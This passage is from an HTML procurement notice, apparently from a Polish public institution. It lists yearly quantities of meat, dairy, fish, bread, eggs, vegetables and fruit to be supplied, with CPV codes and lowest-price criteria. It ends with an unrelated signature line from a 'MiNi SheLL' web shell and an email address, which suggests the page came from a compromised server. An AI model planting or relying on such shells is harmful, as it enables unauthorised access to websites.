boczek rolowany z przyprawami kg 10,
szynkówka dębicka kg 80,
krakowska parzona kg 15,
kaszanka kg 35,
bukowa kg 125,
mortadela popularna kg 240,
mielonka wieprzowa kanapkowa kg 120,
metka kaszubska kg 30,
mielonka turystyczna kg 60,
podwawelska kg 40,
przekładaniec z indyka 165,
pasztetowa wieprzowa kg 175,
pasztet drobiowy zapiekany kg 20,
pieczeń chlebowa kg 70,
polędwica miodowa kg 30,
polędwica sopocka kg 15,
parówki wieprzowe PC kg 215,
serdelki wieprzowe kg 310,
salceson czarny ozorkowy kg 30,
salceson drobiowy kg 85,
salceson wieprzowy kg 40,
śląska kg 175,
szynka gotowana kg 25,
szynkówka wieprzowa kanapkowa kg 30,
ogonówka wieprzowa wędzona parzona kg 30,
toruńska wieprzowa kg 80 ,
zwyczajna kg 65,
żywiecka kg 40,
boczek wieprzowy wędzony b/kości kg 170,
boczek wieprzowy świeży b/kości kg 30,
karkówka wieprzowa bez kości kg 55,
łopatka wieprzowa bez kości ,bez skóry kg 55,
mięso wieprzowe z  szynki-gulaszowe kg 290,
mięso wieprzowe drobne z szynki kg 350,
słonina wieprzowa kg 155,
smalec wieprzowy kg 40,
schab wieprzowy bez kości kg 15,
szynka wieprzowa świeża bez kości kg 290,
wątroba wieprzowa kg 30,
żeberka wieprzowe kg 470,
porcje rosołowe drobiowe kg 850,
kurczaki kg 1000,
piersi z kurczaka kg 230,
wątroba drobiowa kg 100,
żołądki drobiowe kg 135,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6, 15.11.90.00-5, 15.13.11.34-3, 15.13.11.00-6, 15.13.11.30-5, 15.13.11.35-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zakup i dostawa produktów mleczarskich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> mleko folia litrowe szt. 8600,
mleko karton litrowe szt. 70,
śmietana  36 procent 0,5 litrowa szt. 36,
śmietana luzem 18 procent litr 530,
masło extra kostka  kg 1120,
ser salami kg 40,
ser gouda kg 70,
Ser morski kg 70,
ser edamski kg 70,
ser tylżycki kg 70,
serek homogenizowany smakowy 250 g ,szt. 500,
serek ostrowie smakowy 120g ,szt. 900,
twaróg foremka kg 600, 
ser topiony kostka 100g ,kg 160,
margaryna rama250g,  kg 20, 
margaryna palma kostka kg70
margaryna rama450g szt. 130 ,
Margaryna Delma 500g ,szt. 10,
maślanka1 litr szt. 1100,
jogurt owocowy 150g ,szt. 150,
kefir1 litr szt. 10,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zakup i dostawa ryb świeżych, mrożonych, wędzonych, solonych , marynowanych i ich przetworów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> filet z dorsza ze skórą kg 200,
karp patroszony kg 20,
kostka rybna mrożona kg 90,
makrela patroszona bez głów kg 250,
masełko rybne kg 60,
mielone rybne z dorsza kg 30,
płaty śledziowe solone kg 90,
pstrąg patroszony kg 180,
tuszka śledziowa kg 60,
rolmopsy w occie kg10,
rolmopsy w oleju kg10,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6, 15.23.20.00-3, 15.23.40.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zakup i dostawa pieczywa i przetworów mącznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> drożdże kg 10,
ciasto drożdżowe kg 30,
drożdżówki 100g szt. 300,
bułki paryskie 300g szt. 1400,
bułka tarta kg 170,
chleb zwykły krojony 500g ,szt. 12000,
chleb  zwykły razowy 500g ,kg 950, 
bułki szwedki 70g, szt. 75,
pączki szt. 225,
faworki kg 10,
jabłecznik kg 10,
drożdżowe z owocami kg10,
sernik kg 10,
miodownik kg 10,
ciasto kakaowe kg 10,
babki różne kg 10,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9, 15.89.80.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zakup i dostawa jaj, warzyw, ziemniaków i owoców.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> arbuz kg 60,
banany I- IV kg 72,
banany X- XII kg 72,
botwina pęczki Miesiąc V-VI pęczki160,
brukiew  Miesiąc IX-II kg 270,
buraki Miesiąc I-III kg 220,
buraki Miesiąc IV-VI kg 220,
buraki Miesiąc VII-IX kg 220,
buraki Miesiąc X-XII kg 220,
brzoskwinie kg 60,
cebula Miesiąc I-III kg 90,
cebula  Miesiąc IV-VI kg 90,
cebula Miesiąc VII-IX kg 90,
cebula Miesiąc X-XII kg 90,
cukinia Miesiąc IX kg 10,
cytryny  1kg Miesiąc IV kg 20,
czosnek   Miesiąc I-III Kg 0,5,
czosnek   Miesiąc IV-VI Kg 0,5,
czosnek   Miesiąc VII-IX Kg 0,5,
czosnek   Miesiąc X-XII Kg 0,5,
fasola Jaś Miesiąc I-III Kg 5,
fasola Jaś Miesiąc IV-VI Kg 5,
fasola Jaś Miesiąc VII-IX Kg 5,
fasola Jaś Miesiąc X-XII Kg 5,
fasolka drobna Miesiąc I-III Kg 5,
fasolka drobna Miesiąc IV-VI Kg 5,
fasolka drobna Miesiąc VII-IX Kg 5, 
fasolka drobna Miesiąc X-XI Kg 5,
fasolka szparagowa  Miesiąc VII-IX Kg 200,
groch  Kg 20 ,
gruszki Miesiąc VI-IX Kg 10,
jabłka Miesiąc I-III Kg 500,
jabłka Miesiąc IV-VI Kg 500,
jabłka 1kg Miesiąc VII-IX Kg350,
jabłka 1kg Miesiąc X-XII Kg 500,
jaja klasa L  Miesiąc I-III Szt. 4000,
jaja klasa L - Miesiąc IV-VI Szt. 4000,
jaja klasa L - Miesiąc VII-IX Szt. 4000,
jaja klasa L - Miesiąc X-XII Szt. 4000,
kalafior Miesiąc VI-VIII Gł. 130,
kalafior Miesiąc IX-XII Gł. 130,
kapusta kiszona Miesiąc I-III Kg 50,
kapusta kiszona Miesiąc IV-VI Kg 50,
kapusta kiszona Miesiąc VII-IX Kg 30 ,
kapusta kiszona Miesiąc X-XII Kg50,
kapusta biała Miesiąc IV-VI Gł. 200,
kapusta biała Miesiąc VII-X Gł. 150,
kapusta biała Miesiąc I-III Kg 60,
kapusta biała Miesiąc X-XII Kg 60,
kapusta czerwona  Miesiąc X-XII Gł. 35,
kapusta włoska Miesiąc I-III Gł. 50,
kapusta włoska Miesiąc IV-VII Gł. 50,
kapusta włoska Miesiąc VIII-IX Gł. 50,
kapusta włoska Miesiąc X-XII Gł. 50,
kapusta pekińska Miesiąc I-III Gł. 5,
kapusta pekińska Miesiąc IV-VI Gł. 5,
kapusta pekińska Miesiąc VII-IX Gł. 5,
kapusta pekińska Miesiąc X-XII Gł. 5,
kiwi Kg 10,
koperek Miesiąc I-III Pęcz. 175,
koperek- Miesiąc IV-VI Pęczki 175,
koperek Miesiąc VII-IX Pęczki 175,
koperek- Miesiąc X-XII Pęczki 175,
mandarynki Miesiąc I-II Kg 30 ,
mandarynki  Miesiąc III-V Kg 30,
mandarynki  Miesiąc X-XII Kg 30,
marchew  Miesiąc I-III Kg 600,
marchew  Miesiąc IV-VI Kg 500,
marchew   Miesiąc VII-IX Kg 500,
marchew  Miesiąc X-XII Kg 500,
morele Miesiąc VII-VIII Kg 60,
nektarynki Miesiąc VII-VIII Kg 60,
ogórki kiszone Miesiąc I-III Kg 120,
ogórki kiszone Miesiąc IV-VI Kg 120,
ogórki kiszone Miesiąc VII-IX Kg 120,
ogórki kiszone Miesiąc X-XII Kg 120,
ogórki świeże  Miesiąc V-VII Kg 40,
ogórki świeże   Miesiąc VIII-IX Kg 40,
pieczarki   Miesiąc I-III Kg 20,
pieczarki  Miesiąc IV-VI Kg 20,
pieczarki  1kg Miesiąc VII-IX Kg 15,
pieczarki  Miesiąc X-XII Kg 20,
pietruszka   Miesiąc I-III Kg 110,
pietruszka  Miesiąc IV-VI Kg 110,
pietruszka   Miesiąc VII-IX Kg 110,
pietruszka   Miesiąc X-XII Kg 110,
pomarańcze  Miesiąc IV Kg 20,
pomarańcze Miesiąc XII Kg 20,
pomidory Miesiąc VII-IX  kg 260, 
pomidory Miesiąc X-XII kg 250, 
por  Miesiąc I-III Kg 110, 
por  Miesiąc IV-VI Kg 110, 
por Miesiąc VII-IX Kg 110, 
por Miesiąc X-XII Kg 110,
rzodkiewki Miesiąc I-III Pęczki 45,
rzodkiewki Miesiąc IV-VI Pęczki 40,
rzodkiewki Miesiąc VII-IX Pęczki 40,
rzodkiewki i Miesiąc X-XII Pęczki 45,
rzodkiew biała Miesiąc IX-XII Kg 20,
sałata Miesiąc IV-VI Główki 200,
sałata Miesiąc VII-VIII Główki 230,
sałata główki Miesiąc IX- XII Główki 200,
sałata lodowa Główki 20,
seler Miesiąc I-III Kg 150,
seler Miesiąc IV-VI Kg 150,
seler Miesiąc VII-IX Kg 150,
seler Miesiąc X-XII Kg 150,
szczypior Miesiąc I-III Pęczki 70,
szczypior Miesiąc IV-VI Pęczki 65,
szczypior Miesiąc VII-IX Pęczki 65,
szczypior Miesiąc X-XII Pęczki 70,
truskawki Sezon V-VII Kg 50,
winogrono Miesiąc IX-XII Kg 20 ,
zielona pietruszka pęczki 100g Miesiąc I-III Pęczki 180,
zielona pietruszka pęczki 100g Miesiąc IV-VI Pęczki 180,
zielona pietruszka pęczki 100g Miesiąc VII-IX Pęczki 180,
zielona pietruszka pęczki 100g Miesiąc X-XII Pęczki 180,
ziemniaki Miesiąc I-III Kg 3500,
ziemniaki Miesiąc IV-VI Kg 3500,
ziemniaki Miesiąc VII-IX Kg 3500,
ziemniaki Miesiąc X-XII Kg 3500,
brukselka IX-XII  kg20,
szczaw V-IX kg20,
kalarepa VI-IX szt.20,
dynia IX-XII kg 20..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.40-0, 03.14.25.00-3, 03.21.22.00-2, 03.22.11.00-7, 03.22.22.12-8, 03.22.22.00-5, 03.22.21.11-2, 03.22.23.20-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com